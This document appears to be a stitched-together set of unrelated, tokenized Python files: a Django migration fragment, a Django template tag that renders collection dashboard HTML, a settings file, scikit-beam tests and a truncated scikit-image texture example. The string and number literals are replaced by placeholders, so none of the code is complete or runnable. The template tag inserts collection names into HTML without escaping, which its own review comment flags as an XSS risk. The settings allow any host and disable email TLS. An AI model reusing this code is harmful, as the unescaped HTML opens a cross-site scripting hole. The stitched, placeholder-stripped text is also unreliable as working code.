) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , 
'<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> 
'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : 
'<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] <EOL> symmetrical = True </s>
from django import template
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _

register = template.Library()


def user_collections_dashboard(collections, user):
    """Render the dashboard HTML listing *collections* as seen by *user*.

    For each collection an activation snippet (default vs. non-default)
    and an edit snippet (managed vs. not managed by *user*) are built and
    combined into one HTML fragment.

    PERF FIX: snippets are accumulated in a list and joined once at the
    end instead of the original quadratic ``html += snippet`` loop.

    NOTE(review): ``name`` is interpolated into HTML without escaping; if
    collection names can contain user-supplied text this is an XSS risk —
    confirm and escape at the template level if needed.
    """
    parts = ['<STR_LIT>']
    for collection in collections:
        is_default = collection.is_default_to_user(user)
        classname = u'<STR_LIT>' if is_default else u'<STR_LIT>'
        name = collection.name
        edit_url = reverse('<STR_LIT>', args=[collection.pk])
        edit_label = _('<STR_LIT>')
        activation_label = _('<STR_LIT>')
        activation_url = reverse('<STR_LIT>',
                                 args=[user.pk, collection.pk])
        # Non-default collections get an active "make default" control;
        # the default one gets the alternate (inactive) snippet.
        if not is_default:
            activation_snippet = u"""<STR_LIT>""".format(
                activation_url=activation_url,
                activation_label=activation_label,
                lowercase_name=name.lower()).strip()
        else:
            activation_snippet = u"""<STR_LIT>""".format(
                activation_url=activation_url,
                activation_label=activation_label,
                lowercase_name=name.lower()).strip()
        # Managers see a live edit link; everyone else gets the alternate
        # (disabled) markup.
        if collection.is_managed_by_user(user):
            html_edit = u"""<STR_LIT>""".format(
                edit_url=edit_url,
                edit_label=edit_label,
                lowercase_name=name.lower()).strip()
        else:
            html_edit = u"""<STR_LIT>""".format(
                edit_url=edit_url,
                edit_label=edit_label,
                lowercase_name=name.lower()).strip()
        html_snippet = u"""<STR_LIT>""".format(
            classname=classname,
            name=name,
            activation_snippet=activation_snippet,
            lowercase_name=name.lower(),
            html_edit=html_edit).strip()
        parts.append(html_snippet)
    # Single join is O(n); equivalent to the original concatenation.
    return ''.join(parts)


register.simple_tag(user_collections_dashboard)
<s> """<STR_LIT>""" <EOL> import os <EOL> PROJECT_PATH = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> execfile ( os . path . join ( PROJECT_PATH , '<STR_LIT>' ) ) <EOL> INSTALLED_APPS += ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> ALLOWED_HOSTS = [ '<STR_LIT:*>' ] <EOL> API_BALAIO_DEFAULT_TIMEOUT = <NUM_LIT:0> <EOL> JOURNAL_COVER_MAX_SIZE = <NUM_LIT:30> * <NUM_LIT> <EOL> JOURNAL_LOGO_MAX_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> EMAIL_HOST = '<STR_LIT:localhost>' <EOL> EMAIL_USE_TLS = False <EOL> EMAIL_PORT = <NUM_LIT> <EOL> EMAIL_HOST_USER = '<STR_LIT>' <EOL> EMAIL_HOST_PASSWORD = '<STR_LIT>' <EOL> DISABLE_LOGGING_BELOW_LEVEL = '<STR_LIT>' </s>
from __future__ import absolute_import, division, print_function
import six
import numpy as np
from nose.tools import assert_equal
from skbeam.core.constants.basic import (BasicElement, element, basic)


def smoke_test_element_creation():
    """Smoke-test BasicElement construction, attribute access and ordering.

    Every element must be constructible from any capitalisation of its
    symbol or name and from its atomic number; item access, attribute
    access and the reference tuple must agree; consecutive elements must
    satisfy the full set of rich-comparison relations.
    """
    # Keep only the integer (atomic-number) keys of ``basic``.
    elements = sorted(elm for key, elm in six.iteritems(basic)
                      if isinstance(key, int))
    for elm in elements:
        symbol = elm.sym
        full_name = elm.name
        # Every capitalisation variant must be accepted by the constructor.
        spellings = [symbol, symbol.upper(), symbol.lower(),
                     symbol.swapcase(), full_name, full_name.upper(),
                     full_name.lower(), full_name.swapcase()]
        for spelling in spellings:
            created = BasicElement(spelling)
        # Construction from the atomic number must work too, and the
        # resulting object must be printable.
        created = BasicElement(elm.Z)
        str(created)
        for field in element._fields:
            expected = getattr(basic[elm.Z], field)
            via_getitem = created[str(field)]
            via_attr = getattr(created, field)
            # NaN never compares equal, so skip NaN-valued reference
            # fields; non-numeric fields make ``isnan`` raise TypeError.
            try:
                if np.isnan(expected):
                    continue
            except TypeError:
                pass
            assert_equal(via_getitem, expected)
            assert_equal(via_attr, expected)
            assert_equal(via_getitem, via_attr)
    # ``elements`` is sorted, so each consecutive pair must order
    # consistently in both directions.
    for smaller, larger in zip(elements, elements[1:]):
        assert_equal(smaller.__lt__(larger), True)
        assert_equal(smaller < larger, True)
        assert_equal(smaller.__eq__(larger), False)
        assert_equal(smaller == larger, False)
        assert_equal(smaller >= larger, False)
        assert_equal(smaller > larger, False)
        assert_equal(larger < smaller, False)
        assert_equal(larger.__lt__(smaller), False)
        assert_equal(larger <= smaller, False)
        assert_equal(larger.__eq__(smaller), False)
        assert_equal(larger == smaller, False)
        assert_equal(larger >= smaller, True)
        assert_equal(larger > smaller, True)


if __name__ == '<STR_LIT:__main__>':
    import nose
    nose.runmodule(argv=['<STR_LIT>', '<STR_LIT>'], exit=False)
<s> from __future__ import absolute_import , division , print_function <EOL> import numpy as np <EOL> from numpy . testing import ( assert_equal , assert_array_equal , <EOL> assert_array_almost_equal , assert_almost_equal ) <EOL> from nose . tools import raises <EOL> from skbeam . core . cdi import ( _dist , gauss , find_support , <EOL> pi_modulus , cal_diff_error , cdi_recon , <EOL> generate_random_phase_field , <EOL> generate_box_support , generate_disk_support ) <EOL> def dist_temp ( dims ) : <EOL> """<STR_LIT>""" <EOL> new_array = np . zeros ( dims ) <EOL> if np . size ( dims ) == <NUM_LIT:2> : <EOL> x_sq = ( np . arange ( dims [ <NUM_LIT:0> ] ) - dims [ <NUM_LIT:0> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> y_sq = ( np . arange ( dims [ <NUM_LIT:1> ] ) - dims [ <NUM_LIT:1> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> for j in range ( dims [ <NUM_LIT:1> ] ) : <EOL> new_array [ : , j ] = np . sqrt ( x_sq + y_sq [ j ] ) <EOL> if np . size ( dims ) == <NUM_LIT:3> : <EOL> x_sq = ( np . arange ( dims [ <NUM_LIT:0> ] ) - dims [ <NUM_LIT:0> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> y_sq = ( np . arange ( dims [ <NUM_LIT:1> ] ) - dims [ <NUM_LIT:1> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> z_sq = ( np . arange ( dims [ <NUM_LIT:2> ] ) - dims [ <NUM_LIT:2> ] // <NUM_LIT:2> ) ** <NUM_LIT:2> <EOL> for j in range ( dims [ <NUM_LIT:1> ] ) : <EOL> for k in range ( dims [ <NUM_LIT:2> ] ) : <EOL> new_array [ : , j , k ] = np . sqrt ( x_sq + y_sq [ j ] + z_sq [ k ] ) <EOL> return new_array <EOL> def test_dist ( ) : <EOL> shape2D = [ <NUM_LIT> , <NUM_LIT:100> ] <EOL> data = _dist ( shape2D ) <EOL> data1 = dist_temp ( shape2D ) <EOL> assert_array_equal ( data . shape , shape2D ) <EOL> assert_array_equal ( data , data1 ) <EOL> shape3D = [ <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT> ] <EOL> data = _dist ( shape3D ) <EOL> data1 = dist_temp ( shape3D ) <EOL> assert_array_equal ( data . 
shape , shape3D ) <EOL> assert_array_equal ( data , data1 ) <EOL> def test_gauss ( ) : <EOL> shape2D = ( <NUM_LIT:100> , <NUM_LIT:100> ) <EOL> shape3D = ( <NUM_LIT:100> , <NUM_LIT:200> , <NUM_LIT:50> ) <EOL> shape_list = [ shape2D , shape3D ] <EOL> std = <NUM_LIT:10> <EOL> for v in shape_list : <EOL> d = gauss ( v , std ) <EOL> assert_almost_equal ( <NUM_LIT:0> , np . mean ( d ) , decimal = <NUM_LIT:3> ) <EOL> def test_find_support ( ) : <EOL> shape_v = [ <NUM_LIT:100> , <NUM_LIT:100> ] <EOL> cenv = shape_v [ <NUM_LIT:0> ] / <NUM_LIT:2> <EOL> r = <NUM_LIT:20> <EOL> a = np . zeros ( shape_v ) <EOL> a [ cenv - r : cenv + r , cenv - r : cenv + r ] = <NUM_LIT:1.0> <EOL> sw_sigma = <NUM_LIT> <EOL> sw_threshold = <NUM_LIT> <EOL> new_sup_index = find_support ( a , sw_sigma , sw_threshold ) <EOL> new_sup = np . zeros_like ( a ) <EOL> new_sup [ new_sup_index ] = <NUM_LIT:1> <EOL> assert ( np . sum ( new_sup ) == <NUM_LIT> ) <EOL> def make_synthetic_data ( ) : <EOL> """<STR_LIT>""" <EOL> shapev = [ <NUM_LIT:100> , <NUM_LIT:100> ] <EOL> r = <NUM_LIT:20> <EOL> a = np . zeros ( shapev ) <EOL> a [ shapev [ <NUM_LIT:0> ] // <NUM_LIT:2> - r : shapev [ <NUM_LIT:0> ] // <NUM_LIT:2> + r , shapev [ <NUM_LIT:1> ] // <NUM_LIT:2> - r : shapev [ <NUM_LIT:1> ] // <NUM_LIT:2> + r ] = <NUM_LIT:1> <EOL> diff_v = np . abs ( np . fft . fftn ( a ) ) / np . sqrt ( np . size ( a ) ) <EOL> return a , diff_v <EOL> def test_pi_modulus ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> a_new = pi_modulus ( a , diff_v ) <EOL> assert_array_almost_equal ( np . abs ( a_new ) , a ) <EOL> def test_cal_diff_error ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> result = cal_diff_error ( a , diff_v ) <EOL> assert_equal ( np . 
sum ( result ) , <NUM_LIT:0> ) <EOL> def cal_support ( func ) : <EOL> def inner ( * args ) : <EOL> return func ( * args ) <EOL> return inner <EOL> def _box_support_area ( sup_radius , shape_v ) : <EOL> sup = generate_box_support ( sup_radius , shape_v ) <EOL> new_sup = sup [ sup != <NUM_LIT:0> ] <EOL> assert_array_equal ( new_sup . shape , ( <NUM_LIT:2> * sup_radius ) ** len ( shape_v ) ) <EOL> def _disk_support_area ( sup_radius , shape_v ) : <EOL> sup = generate_disk_support ( sup_radius , shape_v ) <EOL> new_sup = sup [ sup != <NUM_LIT:0> ] <EOL> assert ( new_sup . size < ( <NUM_LIT:2> * sup_radius ) ** len ( shape_v ) ) <EOL> def test_support ( ) : <EOL> sup_radius = <NUM_LIT:20> <EOL> a , diff_v = make_synthetic_data ( ) <EOL> shape_list = [ [ <NUM_LIT:100> , <NUM_LIT:100> ] , [ <NUM_LIT:100> , <NUM_LIT:100> , <NUM_LIT:100> ] ] <EOL> for v in shape_list : <EOL> yield _box_support_area , sup_radius , v <EOL> for v in shape_list : <EOL> yield _disk_support_area , sup_radius , v <EOL> def test_recon ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> total_n = <NUM_LIT:10> <EOL> sup_radius = <NUM_LIT:20> <EOL> init_phase = generate_random_phase_field ( diff_v ) <EOL> sup = generate_box_support ( sup_radius , diff_v . shape ) <EOL> outv1 , error_dict = cdi_recon ( diff_v , init_phase , sup , sw_flag = False , <EOL> n_iterations = total_n , sw_step = <NUM_LIT:2> ) <EOL> outv1 = np . abs ( outv1 ) <EOL> outv2 , error_dict = cdi_recon ( diff_v , init_phase , sup , <EOL> pi_modulus_flag = '<STR_LIT>' , sw_flag = True , <EOL> n_iterations = total_n , sw_step = <NUM_LIT:2> ) <EOL> outv2 = np . abs ( outv2 ) <EOL> assert_array_equal ( outv1 . shape , outv2 . shape ) <EOL> @ raises ( TypeError ) <EOL> def test_cdi_plotter ( ) : <EOL> a , diff_v = make_synthetic_data ( ) <EOL> total_n = <NUM_LIT:10> <EOL> sup_radius = <NUM_LIT:20> <EOL> init_phase = generate_random_phase_field ( diff_v ) <EOL> sup = generate_box_support ( sup_radius , diff_v . 
shape ) <EOL> outv , error_d = cdi_recon ( diff_v , init_phase , sup , sw_flag = True , <EOL> n_iterations = total_n , sw_step = <NUM_LIT:2> , cb_function = <NUM_LIT:10> ) </s>
<s> from __future__ import absolute_import , division , print_function <EOL> import os <EOL> import importlib <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> filetypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> blacklisted = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class ValuesError ( ValueError ) : <EOL> pass <EOL> class UnwelcomenessError ( ValuesError ) : <EOL> pass <EOL> def _everybody_welcome_here ( string_to_check , blacklisted = blacklisted ) : <EOL> for line in string_to_check . split ( '<STR_LIT:\n>' ) : <EOL> for b in blacklisted : <EOL> if b in string_to_check : <EOL> raise UnwelcomenessError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:%s>" % ( string_to_check , b , blacklisted ) <EOL> ) <EOL> def _openess_tester ( module ) : <EOL> if hasattr ( module , '<STR_LIT>' ) : <EOL> funcs = module . __all__ <EOL> else : <EOL> funcs = dir ( module ) <EOL> for f in funcs : <EOL> yield _everybody_welcome_here , f . __doc__ <EOL> def test_openness ( ) : <EOL> """<STR_LIT>""" <EOL> starting_package = '<STR_LIT>' <EOL> modules , files = get_modules_in_library ( starting_package ) <EOL> for m in modules : <EOL> yield _openess_tester , importlib . import_module ( m ) <EOL> for afile in files : <EOL> with open ( afile , '<STR_LIT:r>' ) as f : <EOL> yield _everybody_welcome_here , f . read ( ) <EOL> _IGNORE_FILE_EXT = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _IGNORE_DIRS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> def get_modules_in_library ( library , ignorefileext = None , ignoredirs = None ) : <EOL> """<STR_LIT>""" <EOL> if ignoredirs is None : <EOL> ignoredirs = _IGNORE_DIRS <EOL> if ignorefileext is None : <EOL> ignorefileext = _IGNORE_FILE_EXT <EOL> module = importlib . 
import_module ( library ) <EOL> mods = [ ] <EOL> other_files = [ ] <EOL> top_level = os . sep . join ( module . __file__ . split ( os . sep ) [ : - <NUM_LIT:1> ] ) <EOL> for path , dirs , files in os . walk ( top_level ) : <EOL> skip = False <EOL> for ignore in ignoredirs : <EOL> if ignore in path : <EOL> skip = True <EOL> break <EOL> if skip : <EOL> continue <EOL> if path . split ( os . sep ) [ - <NUM_LIT:1> ] in ignoredirs : <EOL> continue <EOL> for f in files : <EOL> file_base , file_ext = os . path . splitext ( f ) <EOL> if file_ext not in ignorefileext : <EOL> if file_ext == '<STR_LIT>' : <EOL> mod_path = path [ len ( top_level ) - len ( library ) : ] . split ( os . sep ) <EOL> if not file_base == '<STR_LIT>' : <EOL> mod_path . append ( file_base ) <EOL> mod_path = '<STR_LIT:.>' . join ( mod_path ) <EOL> mods . append ( mod_path ) <EOL> else : <EOL> other_files . append ( os . path . join ( path , f ) ) <EOL> return mods , other_files <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> import sys <EOL> nose_args = [ '<STR_LIT>' ] + sys . argv [ <NUM_LIT:1> : ] <EOL> nose . runmodule ( argv = nose_args , exit = False ) </s>
<s> """<STR_LIT>""" <EOL> import matplotlib . pyplot as plt <EOL> from skimage . feature import greycomatrix , greycoprops <EOL> from skimage import data <EOL> PATCH_SIZE = <NUM_LIT> <EOL> image = data . camera ( ) <EOL> grass_locations = [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> grass_patches = [ ] <EOL> for loc in grass_locations : <EOL> grass_patches . append ( image [ loc [ <NUM_LIT:0> ] : loc [ <NUM_LIT:0> ] + PATCH_SIZE , <EOL> loc [ <NUM_LIT:1> ] : loc [ <NUM_LIT:1> ] + PATCH_SIZE ] ) <EOL> sky_locations = [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> sky_patches = [ ] <EOL> for loc in sky_locations : <EOL> sky_patches . append ( image [ loc [ <NUM_LIT:0> ] : loc [ <NUM_LIT:0> ] + PATCH_SIZE , <EOL> loc [ <NUM_LIT:1> ] : loc [ <NUM_LIT:1> ] + PATCH_SIZE ] ) <EOL> xs = [ ] <EOL> ys = [ ] <EOL> for patch in ( grass_patches + sky_patches ) : <EOL> glcm = greycomatrix ( patch , [ <NUM_LIT:5> ] , [ <NUM_LIT:0> ] , <NUM_LIT> , symmetric = True , normed = True ) <EOL> xs . append ( greycoprops ( glcm , '<STR_LIT>' ) [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> ys . append ( greycoprops ( glcm , '<STR_LIT>' ) [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> fig = plt . figure ( figsize = ( <NUM_LIT:8> , <NUM_LIT:8> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> ax . imshow ( image , cmap = plt . cm . gray , interpolation = '<STR_LIT>' , <EOL> vmin = <NUM_LIT:0> , vmax = <NUM_LIT:255> ) <EOL> for ( y , x ) in grass_locations : <EOL> ax . plot ( x + PATCH_SIZE / <NUM_LIT:2> , y + PATCH_SIZE / <NUM_LIT:2> , '<STR_LIT>' ) <EOL> for ( y , x ) in sky_locations : <EOL> ax . plot ( x + PATCH_SIZE / <NUM_LIT:2> , y + PATCH_SIZE / <NUM_LIT:2> , '<STR_LIT>' ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_xticks ( [ ] ) <EOL> ax . set_yticks ( [ ] ) <EOL> ax . axis ( '<STR_LIT:image>' ) <EOL> ax = fig . 
add_subplot ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> ax . plot ( xs [ : len ( grass_patches ) ] , ys [ : len ( grass_patches ) ] , '<STR_LIT>' , <EOL> label = '<STR_LIT>' ) <EOL> ax . plot ( xs [ len ( grass_patches ) : ] , ys [ len ( grass_patches ) : ] , '<STR_LIT>' , <EOL> label = '<STR_LIT>' ) <EOL> ax . set_xlabel ( '<STR_LIT>' ) <EOL> ax . set_ylabel ( '<STR_LIT>' ) <EOL> ax . legend ( ) <EOL> for i , patch in enumerate ( grass_patches ) : <EOL> ax = fig . add_subplot ( <NUM_LIT:3> , len ( grass_patches ) , len ( grass_patches ) * <NUM_LIT:1> + i + <NUM_LIT:1> ) <EOL> ax . imshow ( patch , cmap = plt . cm . gray , interpolation = '<STR_LIT>' , <EOL> vmin = <NUM_LIT:0> , vmax = <NUM_LIT:255> ) <EOL> ax . set_xlabel ( '<STR_LIT>' % ( i + <NUM_LIT:1> ) ) <EOL> for i , patch in enumerate ( sky_patches ) : <EOL> ax = fig . add_subplot ( <NUM_LIT:3> , len ( sky_patches ) , len ( sky_patches ) * <NUM_LIT:2> + i + <NUM_LIT:1> ) <EOL> ax . imshow ( 